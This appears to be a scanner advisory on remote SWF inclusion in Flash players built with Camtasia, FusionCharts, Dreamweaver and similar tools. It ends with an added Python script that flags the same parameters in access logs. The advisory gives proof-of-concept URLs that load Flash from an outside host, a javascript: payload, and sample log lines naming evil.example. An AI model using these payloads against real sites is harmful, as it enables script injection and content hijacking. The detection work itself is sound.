Possible remote SWF inclusion

Description

A number of products used to create SWF files (Techsmith Camtasia, InfoSoft FusionCharts, Adobe Acrobat Connect, Macromedia Breeze, Adobe Dreamweaver, Adobe Contribute, Autodemo) were found vulnerable to remote SWF inclusion. This page includes a SWF file that is possibly affected by these vulnerabilities.

  • Adobe Dreamweaver and Contribute:
    The "skinName" parameter loads an arbitrary Flash file:
    http://www.example.com/FLVPlayer_Progressive.swf?skinName=http://rcannings.googlepages.com/DoKnowEvil
  • Adobe Acrobat Connect (including Macromedia Breeze):
    The "baseurl" parameter loads an arbitrary Flash file:
    http://www.example.com/main.swf?baseurl=http://rcannings.googlepages.com/DoKnowEvil.swf%3f
  • InfoSoft FusionCharts:
    The "dataURL" parameter loads an arbitrary Flash file:
    http://www.example.com/Example.swf?debugMode=1&dataURL=%27%3E%3Cimg+src%3D%22http%3A//rcannings.googlepages.com/DoKnowEvil.swf%3F.jpg%22%3E
  • Techsmith Camtasia:
    The "csPreloader" parameter loads an arbitrary Flash file:
    http://www.example.com/Example_controller.swf?csPreloader=http://rcannings.googlepages.com/DoKnowEvil.swf%3f
  • Autodemo:
    The "onend" parameter loads arbitrary URLs, including the javascript: protocol handler:
    http://www.example.com/control.swf?onend=javascript:alert(1)//
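The parameter names listed above are the practical detection signal: a request for a .swf file whose skinName, baseurl, dataURL, csPreloader or onend parameter carries an off-site URL or a javascript: URI is worth alerting on until the affected SWF is recompiled. The script below is an added example and is not part of this advisory or of any of the named products; it scans web-server access log lines for exactly that pattern. The log lines, client addresses and the host evil.example are constructed for the example, and the allowed_hosts allow-list (the site's own hostnames, for players that legitimately take absolute URLs) is an assumption about how a deployment would tune it.

```python
"""Flag access-log requests for .swf files whose known remote-inclusion
parameters carry an external URL or a script URI (added example, not
code from the advisory; sample log lines below are constructed)."""
import re
from urllib.parse import parse_qs, urlsplit

# Parameter names cited in the advisory, mapped to the product family
RISKY_PARAMS = {
    "skinname": "Adobe Dreamweaver/Contribute FLVPlayer",
    "baseurl": "Adobe Acrobat Connect / Macromedia Breeze",
    "dataurl": "InfoSoft FusionCharts",
    "cspreloader": "Techsmith Camtasia",
    "onend": "Autodemo",
}

# Constructed Common Log Format lines; hosts and addresses are made up
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /FLVPlayer_Progressive.swf?skinName=Clear_Skin_1 HTTP/1.1" 200 5120
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /FLVPlayer_Progressive.swf?skinName=http://evil.example/x.swf HTTP/1.1" 200 5120
198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /control.swf?onend=javascript:alert(1)// HTTP/1.1" 200 2048
198.51.100.7 - - [10/Oct/2023:13:56:09 +0000] "GET /Example.swf?debugMode=1&dataURL=%27%3E%3Cimg+src%3D%22http%3A//evil.example/x.swf%3F.jpg%22%3E HTTP/1.1" 200 9000
192.0.2.9 - - [10/Oct/2023:13:57:00 +0000] "GET /index.html HTTP/1.1" 200 1024
"""

REQ_RE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/')
# Any URI scheme inside a value, so injected markup (the FusionCharts case)
# is caught even when the URL is not at the start of the value
SCHEME_RE = re.compile(r"(?i)(?:https?|ftp|javascript|data|vbscript):")


def classify_value(value, allowed_hosts=frozenset()):
    """Return a reason string if the value points off-site or to a script
    URI, else None. allowed_hosts is the site's own hostnames (assumption)."""
    m = SCHEME_RE.search(value)
    if not m:
        return None
    scheme = m.group(0)[:-1].lower()
    if scheme in ("http", "https", "ftp"):
        try:
            host = (urlsplit(value[m.start():]).hostname or "").lower()
        except ValueError:  # malformed netloc, e.g. unbalanced IPv6 brackets
            host = ""
        if host in allowed_hosts:
            return None
        return f"loads external {scheme} URL from host {host!r}"
    return f"uses {scheme}: URI"


def scan_log(text, allowed_hosts=frozenset()):
    """Return (client_ip, swf_path, param, product, reason) tuples for every
    .swf request whose risky parameter carries an off-site or script URI."""
    findings = []
    for line in text.splitlines():
        m = REQ_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.lower().endswith(".swf"):
            continue
        client = line.split(" ", 1)[0]
        # parse_qs percent-decodes values, so encoded payloads are inspected decoded
        for name, values in parse_qs(parts.query, keep_blank_values=True).items():
            product = RISKY_PARAMS.get(name.lower())
            if product is None:
                continue
            for value in values:
                reason = classify_value(value, allowed_hosts)
                if reason:
                    findings.append((client, parts.path, name, product, reason))
    return findings


if __name__ == "__main__":
    for client, path, param, product, reason in scan_log(SAMPLE_LOG):
        print(f"{client} {path} {param}={product}: {reason}")
```

Run against real logs by piping the file into scan_log; the built-in skin name Clear_Skin_1 on the first line is not flagged because it carries no URI scheme, while the three requests that point at evil.example or a javascript: URI are. Passing the site's own hostnames in allowed_hosts suppresses hits from players that legitimately take absolute same-origin URLs without hiding the javascript: case.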

Remediation

The product used to create this SWF file (Techsmith Camtasia, InfoSoft FusionCharts, Adobe Acrobat Connect, Macromedia Breeze, Adobe Dreamweaver, Adobe Contribute, Autodemo) should be upgraded to the latest version and the SWF file should be recompiled with the fixed version.

References